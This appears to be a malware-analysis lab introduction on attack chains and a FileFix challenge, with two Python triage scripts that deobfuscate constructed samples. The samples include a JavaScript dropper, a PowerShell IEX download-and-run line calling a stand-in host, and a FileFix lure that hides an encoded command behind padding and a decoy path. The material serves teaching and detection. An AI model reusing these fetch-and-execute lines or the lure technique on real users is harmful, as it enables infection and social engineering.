Understanding Malware Attack Chains

As a malware analyst, you’ll often need to investigate how malware infects a computer from start to finish. Threat actors rarely distribute the final-stage payload directly. Instead, they break the attack into several steps, often referred to as a kill chain.

Here’s how a typical attack might work

For example, imagine someone receives a suspicious email with an attachment. When they open it, here’s what happens:

  1. The attachment is a zip file containing a JavaScript file
  2. When opened, the JavaScript file runs through Windows Script Host (WScript), which is built into Windows
  3. The JavaScript connects to an attacker-controlled URL and downloads a malware loader
  4. The loader fetches and runs the malicious payload, often in memory
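
The first three steps of that chain are what an analyst usually has in hand: a zip attachment and the script inside it, with the download URL hidden behind string tricks. Below is an added example (not code from the page or the lab) of the static triage a practitioner would run over such an attachment: it unpacks script-like members from an in-memory zip, folds `String.fromCharCode(...)` and `"a" + "b"` concatenations back into plain literals, and then extracts URLs, ActiveX ProgIDs and the WScript.Shell `.Run(` indicator. The sample script, hostname and file names are constructed for this example; the string folding is a heuristic that assumes double-quoted literals without escapes.

```python
import io
import re
import zipfile

# Constructed sample attachment: a JavaScript dropper of the kind described in
# the chain above. The hostname, file names and string-hiding tricks are invented
# for this example; they are not taken from any real sample.
SAMPLE_JS = r"""
var s = "h" + "t" + "tp" + "s://" + "cdn.exa" + "mple.invalid/l" + "oader.bin";
var sh = new ActiveXObject("WScript.Shell");
var x = new ActiveXObject("MSXML2.XMLHTTP");
x.open("GET", s, false); x.send();
var p = String.fromCharCode(112,111,119,101,114,115,104,101,108,108);
sh.Run(p + " -w hidden -c IEX(...)", 0, false);
"""

SCRIPT_EXTENSIONS = (".js", ".jse", ".vbs", ".vbe", ".wsf", ".hta")

FROMCHARCODE = re.compile(r"String\.fromCharCode\(\s*([\d\s,]+?)\s*\)")
CONCAT = re.compile(r'"([^"\\\n]*)"\s*\+\s*"([^"\\\n]*)"')
STRING_LIT = re.compile(r'"([^"\\\n]*)"')
ACTIVEX = re.compile(r'ActiveXObject\("([^"]+)"\)')
URL = re.compile(r"https?://[^\s\"']+")


def build_zip(js_source, name="invoice.pdf.js"):
    """Pack the constructed script into an in-memory zip, as a mail gateway would see it."""
    buf = io.BytesIO()
    with zipfile.ZipFile(buf, "w") as zf:
        zf.writestr(name, js_source)
    return buf.getvalue()


def fold_fromcharcode(js):
    """Replace String.fromCharCode(112,111,...) with the literal it builds.
    Assumes the decoded text contains no double quote (true for the sample)."""
    def repl(m):
        codes = [int(c) for c in m.group(1).split(",") if c.strip()]
        return '"' + "".join(chr(c) for c in codes) + '"'
    return FROMCHARCODE.sub(repl, js)


def fold_concat(js):
    """Join adjacent string literals ("h" + "t" -> "ht") until nothing changes."""
    prev = None
    while prev != js:
        prev = js
        js = CONCAT.sub(lambda m: '"' + m.group(1) + m.group(2) + '"', js)
    return js


def triage(js):
    """Static pass over one script: recover strings, then pull out the indicators."""
    folded = fold_concat(fold_fromcharcode(js))
    strings = STRING_LIT.findall(folded)
    return {
        "strings": strings,
        "urls": [u for s in strings for u in URL.findall(s)],
        "activex": sorted(set(ACTIVEX.findall(folded))),
        "runs_shell": "WScript.Shell" in folded and ".Run(" in folded,
    }


def analyze_zip(zip_bytes):
    """Return triage results for every script-like member of the archive."""
    results = {}
    with zipfile.ZipFile(io.BytesIO(zip_bytes)) as zf:
        for name in zf.namelist():
            if name.lower().endswith(SCRIPT_EXTENSIONS):
                results[name] = triage(zf.read(name).decode("utf-8", "replace"))
    return results


if __name__ == "__main__":
    for name, r in analyze_zip(build_zip(SAMPLE_JS)).items():
        print(name, r["urls"], r["activex"], "runs shell:", r["runs_shell"])
```

The point of folding before searching is that a plain `grep` for `http` on the raw script finds nothing; the URL only exists once the concatenation is resolved. Real droppers layer more tricks on top (array lookups, `eval` of decoded blobs, `.replace` chains), so treat this as the first pass that tells you which strings and objects to chase in a debugger or a sandbox, not as a complete deobfuscator.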

Why does this matter?

These attack chains can be fairly complex and may involve a different programming language at each step. Many threats download and run payloads in memory rather than writing malicious files to disk. This reduces antivirus detections and hinders analysis, since there is no file artifact to scan or collect after the fact. Understanding different malware kill chains is an essential skill for malware analysts.

What you’ll be doing

In these challenges, you’ll work with example attack chains designed to mirror real-world malware seen in the wild. Your goal is to trace each step of the chain until you reach the final payload, which contains a hidden flag. These exercises are more challenging than the other labs, but they’ll give you hands-on experience with more realistic malware analysis.

Good luck, and have fun!

Multistage 1 - FileFix

Lab Type:
Static Analysis
Languages:
PowerShell
JavaScript
x86_64
Platform:
Windows 64-bit
Difficulty:

This challenge begins with a common 'FileFix' lure used to social engineer users into running malicious commands. You'll need to extract the malicious command from the web page and analyze the full infection chain.
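
The lab asks you to recover the command the lure page pushes at the user before you follow the rest of the chain. As an added example (not the lab's page or solution), the script below assumes the common FileFix layout: the page copies a command to the clipboard and tells the victim to paste it into the File Explorer address bar, the real `powershell -e <base64>` comes first, a long run of spaces pushes it out of view, and a `#` comment at the end holds a believable file path that is all the victim sees. The script pulls the clipboard string out of the page's `<script>` block, splits it into the part that runs and the decoy, decodes the UTF-16LE base64 that `-EncodedCommand` expects, and lists the URLs in the decoded stage. The page markup, stage-2 command and decoy path are constructed here; a real lure may store the command differently, so the extraction step is the part you adapt.

```python
import base64
import json
import re

# Everything below is constructed for this example. The stage-2 command, the
# decoy path and the page markup are invented; they are not from the lab or any
# real FileFix page.
STAGE2 = "IEX (New-Object Net.WebClient).DownloadString('https://cdn.example.invalid/stage2.ps1')"
DECOY_PATH = r"C:\company\shared\Invoice_Q3.pdf"


def encode_powershell(cmd):
    """PowerShell's -EncodedCommand takes base64 of the UTF-16LE script text."""
    return base64.b64encode(cmd.encode("utf-16-le")).decode("ascii")


def decode_powershell(b64):
    return base64.b64decode(b64).decode("utf-16-le")


# Assumed lure layout: the real command first, then a long run of spaces so the
# File Explorer address bar shows only the tail, which is a '#' comment holding
# a believable file path.
CLIPBOARD_CMD = (
    f"powershell -w hidden -e {encode_powershell(STAGE2)}"
    + " " * 200
    + "# " + DECOY_PATH
)

SAMPLE_PAGE = (
    "<p>Your document is ready. Open File Explorer, press Ctrl+L, paste the path and press Enter.</p>\n"
    '<button id="copy">Copy path</button>\n'
    "<script>\n"
    f"const p = {json.dumps(CLIPBOARD_CMD)};\n"
    "document.getElementById('copy').onclick = () => navigator.clipboard.writeText(p);\n"
    "</script>\n"
)

JS_STRING = re.compile(r'"(?:[^"\\]|\\.)*"')
ENCODED_ARG = re.compile(r"(?i)-e(?:c|nc|ncodedcommand)?\s+([A-Za-z0-9+/=]+)")
URL = re.compile(r"https?://[^\s'\")]+")


def clipboard_candidates(page_html):
    """Pull every double-quoted JS string literal out of the page's <script> blocks
    and keep the ones that look like a shell command. json.loads does the unescaping;
    that works for the escapes json.dumps produced here (an assumption of this
    example, not a rule for arbitrary JS literals)."""
    found = []
    for script in re.findall(r"<script[^>]*>(.*?)</script>", page_html, re.S | re.I):
        for lit in JS_STRING.findall(script):
            try:
                found.append(json.loads(lit))
            except ValueError:
                continue
    return [s for s in found if re.search(r"(?i)powershell|cmd(\.exe)?\b|mshta", s)]


def parse_filefix_command(cmd):
    """Split the pasted command into what runs and what the victim was meant to see."""
    runs, _, decoy = cmd.rpartition("#")
    padding = len(runs) - len(runs.rstrip())
    m = ENCODED_ARG.search(runs)
    decoded = decode_powershell(m.group(1)) if m else None
    return {
        "decoy_path": decoy.strip(),
        "padding": padding,
        "decoded_command": decoded,
        "urls": URL.findall(decoded or runs),
    }


def analyze_page(page_html):
    return [parse_filefix_command(c) for c in clipboard_candidates(page_html)]


if __name__ == "__main__":
    for r in analyze_page(SAMPLE_PAGE):
        print("decoy:", r["decoy_path"])
        print("padding spaces:", r["padding"])
        print("decoded:", r["decoded_command"])
        print("urls:", r["urls"])
```

Two checks worth keeping in mind when you do this by hand: the base64 must be decoded as UTF-16LE, not UTF-8, or you get every other byte as a NUL and the text looks like garbage; and the decoy path and the padding are themselves indicators, since a legitimate "copy path" button has no reason to append two hundred spaces and a comment.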